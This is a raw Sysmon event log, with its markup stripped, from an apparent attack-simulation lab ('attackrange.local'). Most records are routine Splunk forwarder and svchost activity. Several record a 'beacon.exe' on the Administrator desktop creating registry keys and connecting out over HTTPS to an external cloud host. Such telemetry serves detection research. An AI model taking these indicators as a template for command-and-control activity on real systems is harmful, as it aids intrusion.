23542300x800000000000000021219179Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:46.257{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C474F335592DF50730468A95FF3A8F29,SHA256=1C08889B4CD183EF8A377FE18357572CCF0E150801AFBD06047C6CCAA0237ADA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219178Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:46.007{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46CF0953E7E65314E18DCF31635D3573,SHA256=A9DAB33AC75F9B6900B3E19407509EDE5456D9DFDF26A6F418D669BE165D1DF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343894Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:47.574{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343893Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:47.554{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DED9B4595DAEDC949A9DAED75382FE6,SHA256=77697784960BB710F7DB862823DDC0BDCCB17181F608123FC68EE53E1771362Afalsetrue 10341000x800000000000000021219187Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:47.933{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-A1B2-6168-2661-04000000F101}4008C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219186Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:47.933{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-1000-00000000F101}972C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219185Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:47.933{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-1300-00000000F101}308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219184Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:47.933{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-0C00-00000000F101}732C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000021219183Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:33.660{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64294-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219182Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:47.038{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=321766C66548B7349712AB66278D7430,SHA256=0896CBCD7247309921FCDF0CF6753AF6BD26B75DFDB5A15E4661ED86792C6E96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057343902Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:14:48.901{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057343901Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:14:48.901{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x800000000000000057343900Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:48.569{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343899Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:48.569{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18A7F74E383976AFA10AD0EBF3689CCA,SHA256=79FCC6972A723FEC95264F473B5003061B2B578789EDF41BDF2B92B2FF823803falsetrue 23542300x800000000000000021219188Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:48.042{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F31CFCA7E53D2C077FC1847F008EF322,SHA256=87D67111CF522D26623909E76F97C8303CB29F86BB5082292DF78B71AED51230,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057343898Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:19.505{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54499-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057343897Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:48.169{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:48.169{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D3A5D6BE7339CC666380FA50CF33E4B,SHA256=BF83BED3418C8B06296D541CCE62C22A1C75F720C01360D1388AEA8ADB20DFABfalsetrue 10341000x800000000000000057343895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:48.132{8B6011A9-886D-6164-0D00-00000000F101}9048492C:\Windows\system32\svchost.exe{8B6011A9-886D-6164-0F00-00000000F101}92C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057343911Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:49.936{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343910Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:49.936{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9738D4AC8DF7E1D4FBAEE738719FA175,SHA256=E3C42EE7CDAF559F8CCC69C3FE510C764A19EBB16A2DE345ABECF5FB07C9565Dfalsetrue 11241100x800000000000000057343909Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:49.570{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343908Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:49.570{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3FBC67DB7482AB7FC83F06FF0F6F4E5,SHA256=1A99F35D8576EDCD5D2071A5898686932FF10C7784C12892A6BB42FC902B7C05falsetrue 23542300x800000000000000021219189Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:49.074{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07B719FAEC22AA00DCA3133BF89574C3,SHA256=250CA4AF6465F606B1C6447EAB188E7E82B914FEA4FDEA119FA9FE3AD29D89E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000057343907Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:49.154{8B6011A9-886D-6164-0D00-00000000F101}9048492C:\Windows\system32\svchost.exe{8B6011A9-887D-6164-2A00-00000000F101}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057343906Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:49.154{8B6011A9-886D-6164-0D00-00000000F101}9048492C:\Windows\system32\svchost.exe{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057343905Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:49.154{8B6011A9-886D-6164-0D00-00000000F101}9048492C:\Windows\system32\svchost.exe{8B6011A9-886D-6164-1100-00000000F101}420C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057343904Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:49.154{8B6011A9-886D-6164-0D00-00000000F101}9048492C:\Windows\system32\svchost.exe{8B6011A9-8897-6164-8000-00000000F101}4756C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057343903Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:49.154{8B6011A9-886D-6164-0D00-00000000F101}9048492C:\Windows\system32\svchost.exe{8B6011A9-886D-6164-0C00-00000000F101}848C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057343914Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:50.584{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343913Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:50.584{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADB6C8545350A02E37AA8C716D0F2A8B,SHA256=2A794512BDDB4E5FCFB6D9C280920EED51E6E53114FC4CF206C0A95C1CC403F7falsetrue 23542300x800000000000000021219190Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:50.074{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=560458CA3047A34459117B795745E2D3,SHA256=0A074C6208D566B0B6C199D385ED7D9EEDF6CABD17FBB96DB47D8C1B5726C51B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057343912Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:21.255{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54500-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 11241100x800000000000000057343916Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:51.600{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343915Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:51.600{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=139205E1E545ADB0F575C04E02DF6FB6,SHA256=67AF672CF595D4C4F4975ADA3B2CA438C614954045C0FA77B0845B59C3621FE5falsetrue 23542300x800000000000000021219191Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:51.074{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A7698D0F0C9D1096C818E1BCF938DFF,SHA256=B1191710FB27003EF1B1D03F9988DF628C7EA255EE26E627B72B0C2C1384C6F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343918Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:52.633{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343917Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:52.633{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A4A9315CAE98FA30B655E5D5A250D13,SHA256=66B1FECD762DE95C7D3903C5D2DAC04B5E0CE1933246AFEF97F7B395DAB27EC6falsetrue 23542300x800000000000000021219194Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:52.245{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6B14F832FE6B4F31599C42B1F948697,SHA256=DCC02F3A910E341239BBB35D374B654E8FD46FFCE4AFB051D412155FC438CDC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219193Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:52.245{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B610E362CEC9685C16E327A7356FA7D,SHA256=883840BFA1A47F496C65ED1BF2F5DF262EFCE7CB1ACF4F34BC8A93869323B899,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219192Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:52.074{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=461AC19B178059EA1E1683DB00CE54AD,SHA256=181CB469D63898259EFA88445A28FB80F0DD2419A8E1B4EA9852AA93A2E551C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343923Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:53.652{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343922Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:53.652{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E057F7175A1EABE528B264A5CCE0D2C8,SHA256=9A7FDF018330D4A0706EFBF7ABDEAA3B736CFDEAEEA9E0C3D8DC685C0B8BCA70falsetrue 354300x800000000000000021219196Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:39.633{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64295-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219195Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:53.089{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FE4F96837A268B61950230332C406DF,SHA256=E8504098D6182A8F33E7E2D5CF6744144D57D285A884F38B9B8B67EE25AE2AAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057343921Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:24.519{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54501-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057343920Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:53.169{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343919Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:53.169{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0395A72D647583BDAA03FB8E9D813D7C,SHA256=A1EFB8A42D929BFA678F3FBF9BF58DE23A560ABA29F0E2C0CBE7689CEA351F68falsetrue 11241100x800000000000000057343929Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:54.668{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343928Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:54.668{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=296AB0BCE0B2155A4CBEFA73A81109D2,SHA256=65C08C27BA03657689B0C0672FFDED8257F52C83BD596C196FAFD8A73116F2BBfalsetrue 23542300x800000000000000021219197Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:54.136{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C09934B9C691CDAB9BF0E91317A032BF,SHA256=2280572525D3BC1D82055BC4C3DCA57280B5BC692EEF9F1663AC93F4422E9A56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343927Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:54.652{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm2021-11-12 12:14:54.652 11241100x800000000000000057343926Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:54.652{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal2021-11-12 12:14:54.652 11241100x800000000000000057343925Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:54.636{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm2021-11-12 12:14:54.636 11241100x800000000000000057343924Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:54.636{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal2021-11-12 12:14:54.636 11241100x800000000000000057343931Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:55.686{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343930Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:55.686{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 